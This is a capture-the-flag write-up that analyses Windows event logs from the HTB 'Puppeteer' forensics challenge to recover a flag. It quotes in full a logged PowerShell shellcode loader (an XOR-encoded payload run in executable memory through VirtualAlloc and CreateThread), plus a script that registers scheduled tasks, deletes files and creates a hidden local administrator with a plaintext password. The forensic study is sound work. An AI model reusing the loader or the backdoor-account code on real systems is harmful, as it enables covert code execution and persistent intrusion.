HTB-CA22-forensic-puppeteer
Disclaimer
This was just an exploration of how to do things on both the host system (Windows) and in Linux, like reading the event logs and such. The route taken might not be the quickest, but it was fun to experiment with various ways of doing things.
Backstory
Each challenge had a story tied to it, for this challenge it was:
Planet Longhir is known for its top-tier researchers. Due to their dedication in science and engineering, their military equipment is the most advanced one in the galaxy.
In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in Ratnik galaxy, is being used to disable Galactic Federation’s communication satellites.
The mystery that Miyuki is trying to solve is, how the satellite’s location was leaked since it is a top-secret that only Galactic Federation’s council is aware of. Help her analyse the Council’s HQ event logs and solve this mystery.
Attack the challenge
There’s a downloadable file, forensics_puppeteer.zip, containing Windows event logs, which need to be analyzed in order to see how the satellite location was leaked. We assume that we’re looking for some type of GPS coordinates or lat/long.
The usual suspects:
grep -iR "HTB{" .        # returned nothing
grep -iR "satelite" .    # returned nothing
grep -iR "lat" .         # returned two files, reported as binary matches:
grep: ./Microsoft-Windows-LiveId%4Operational.evtx: binary file matches
grep: ./Microsoft-Windows-Store%4Operational.evtx: binary file matches
Analyzing the "LiveId Operational" log seems to show some type of communication with tokens and such. Probably a rabbit hole.
Next try:
The files are all named differently, with an annoying %4 and spaces in the names, so rename all of them and remove the spaces from the filenames.
Afterwards, use the program https://github.com/omerbenamram/evtx to convert all the evtx files to JSON.
Small script to fix the filenames:
#!/bin/bash
LOGDIR=/mnt/hgfs/VMSHARED/HTB/cyberApocalypse2022/forensics/puppeteer/Logs/test
# Iterate with a glob (not $(ls ...)) so names containing spaces are not split into
# several words; quote every expansion for the same reason.
for fil in "$LOGDIR"/*.evtx; do
    # strip the spaces and the URL-encoded "%4" in one step, so the second rename
    # never looks for a file that the first rename already moved away
    newname=$(printf '%s' "$fil" | sed 's/ //g; s/%4//g')
    [ "$fil" != "$newname" ] && mv -- "$fil" "$newname"
done
And in order not to do everything manually, convert the evtx files to JSON with a loop:
#!/bin/bash
# evtx_dump -f <output_file> -o json <input_file>
# The filenames have no spaces any more, but a glob is still safer than $(ls *.evtx).
for FIL in *.evtx; do
    ./evtx_dump-v0.7.2-x86_64-unknown-linux-gnu -f "$FIL.json" -o json "$FIL"
done
A lot of the JSON files were empty, so let's clear those out:
mkdir JSON
mv *.json JSON/
find JSON/ -empty -type f -delete
Start searching through the JSON to see whether we can find some more interesting strings:
grep -iR "HQ" .
Looking for special_orders.ps1 led to some more interesting stuff, like:
./Microsoft-Windows-PowerShellOperational.evtx.json: "ScriptBlockText":
"$OleSPrlmhB = @\"\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n\"@\r\n\r\n[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;\r\n[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;\r\n\r\n$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name \"Win32\" -namespace Win32Functions -passthru;\r\n\r\n[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,
0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;\r\n\r\n[array]::Reverse($stage2);\r\n\r\n$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);\r\n\r\n$stage3 = $stage1 + $stage2;\r\n\r\n[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);\r\n\r\n\r\n# Unpack Shellcode;\r\n\r\nfor($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)\r\n{\r\n $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;\r\n}\r\n\r\n#Unpack Special Orders!\r\n\r\nfor($i=0;$i -lt $stage3.count;$i++){\r\n $stage3[$i] = $stage3[$i] -bxor 0xd1;\r\n}\r\n\r\n$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);\r\n"
Further investigation of the files containing HQ, in the file Microsoft-Windows-PowerShellOperational.evtx, showed signs of a backup_op administrator being created, and some scheduled tasks to sabotage Miyuki:
Log Name: Microsoft-Windows-PowerShell/Operational
Source: Microsoft-Windows-PowerShell
Date: 2022-05-06 17:43:51
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: S-1-5-21-2389065719-3342106636-307857974-1002
Computer: Council-HQ
Description:
Creating Scriptblock text (1 of 1):
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Elevate Powers"
# Describe the scheduled task.
$description = "Steal weapons"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Sabotage Miyuki"
# Describe the scheduled task.
$description = "Bypass Arms Embargo"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
#start windows update service
Get-Service -Name wuauserv | Start-Service -Verbose
#delete childs
Get-ChildItem "C:\Windows\SoftwareDistribution\*" -Recurse -Force -Verbose -ErrorAction SilentlyContinue | remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
#clear temp folder
Get-ChildItem "C:\users\*\AppData\Local\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete))} |
remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
cleanmgr /sagerun:12
do {
"waiting for cleanmgr to complete. . ."
start-sleep 5
} while ((get-wmiobject win32_process | where-object {$_.processname -eq 'cleanmgr.exe'} | measure).count)
# Create Admin Account
function Create-NewLocalAdmin {
[CmdletBinding()]
param (
[string] $NewLocalAdmin,
[securestring] $Password
)
begin {
}
process {
New-LocalUser "$NewLocalAdmin" -Password $Password -FullName "$NewLocalAdmin" -Description "Temporary local admin"
Write-Verbose "$NewLocalAdmin local user crated"
Add-LocalGroupMember -Group "Administrators" -Member "$NewLocalAdmin"
Write-Verbose "$NewLocalAdmin added to the local administrator group"
}
end {
}
}
$NewLocalAdmin = "backup_op";
$Password = ConvertTo-SecureString "sup3rk3y" -AsPlainText -Force;
Create-NewLocalAdmin -NewLocalAdmin $NewLocalAdmin -Password $Password
Save the special_orders.ps1 script, and modify the code so that only the unpacking of the special orders is run (the shellcode allocation and CreateThread call are dropped):
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
[array]::Reverse($stage2);
$stage3 = $stage1 + $stage2;
#Unpack Special Orders!
for ($i = 0; $i -lt $stage3.count; $i++) {
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
write-host $stage3
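The same unpacking can be replayed offline without running any of the logged PowerShell. This is an added example, not part of the original writeup: it pulls the `[byte[]] $stage1` and `$stage2` arrays straight out of the logged ScriptBlockText (copied verbatim from above), reverses stage2, appends it to stage1 and XORs every byte with the script's own key 0xd1. The parser also handles any further `[byte[]]` arrays in a block, so the big shellcode array can be decoded the same way for analysis.

```python
import re

# The two stage arrays and the unpacking lines, copied verbatim from the logged script block.
SCRIPT_BLOCK = r"""
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
[array]::Reverse($stage2);
$stage3 = $stage1 + $stage2;
"""
XOR_KEY = 0xD1  # the key used by both "-bxor 0xd1" loops in the logged script

def parse_byte_arrays(script: str) -> dict[str, bytes]:
    """Collect every `[byte[]] $name = 0x.., 0x..;` assignment in a PowerShell script block."""
    arrays = {}
    for name, body in re.findall(r"\[byte\[\]\]\s*\$(\w+)\s*=\s*([^;]+);", script):
        arrays[name] = bytes(int(tok, 16) for tok in re.findall(r"0x[0-9a-fA-F]{1,2}", body))
    return arrays

def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same transform the script applies in its unpack loops."""
    return bytes(b ^ key for b in data)

def unpack_special_orders(script: str, key: int = XOR_KEY) -> str:
    """Replay the script's own unpacking: reverse stage2, append to stage1, XOR with the key."""
    arrays = parse_byte_arrays(script)
    stage3 = arrays["stage1"] + arrays["stage2"][::-1]
    return xor_bytes(stage3, key).decode("ascii")

if __name__ == "__main__":
    print(unpack_special_orders(SCRIPT_BLOCK))
```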
Run the PowerShell script and get the characters as decimal output:
72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 48 48 116 53 95 48 102 95 106 117 115 116 49 99 51 46 46 46 125
Run that through CyberChef with a decimal-to-ASCII conversion and get:
HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
Flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}